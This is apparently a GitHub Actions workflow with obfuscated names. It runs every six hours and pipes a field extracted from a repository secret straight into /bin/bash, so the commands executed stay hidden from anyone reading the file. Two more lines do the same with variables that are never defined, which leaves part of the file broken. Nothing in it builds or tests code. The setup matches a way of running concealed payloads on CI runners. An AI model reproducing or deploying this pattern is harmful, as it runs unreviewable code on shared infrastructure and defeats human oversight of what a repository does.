name: gansila4571

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gansila4571
        env:
          g7: ${{ secrets.g7 }}
        run: |
          echo $g7 | jq -r .cvpyp245 | /bin/bash
          echo $nq18687 | jq -r .zs686 | /bin/bash
          echo $er8 | jq -r .wojnt8172 | /bin/bash

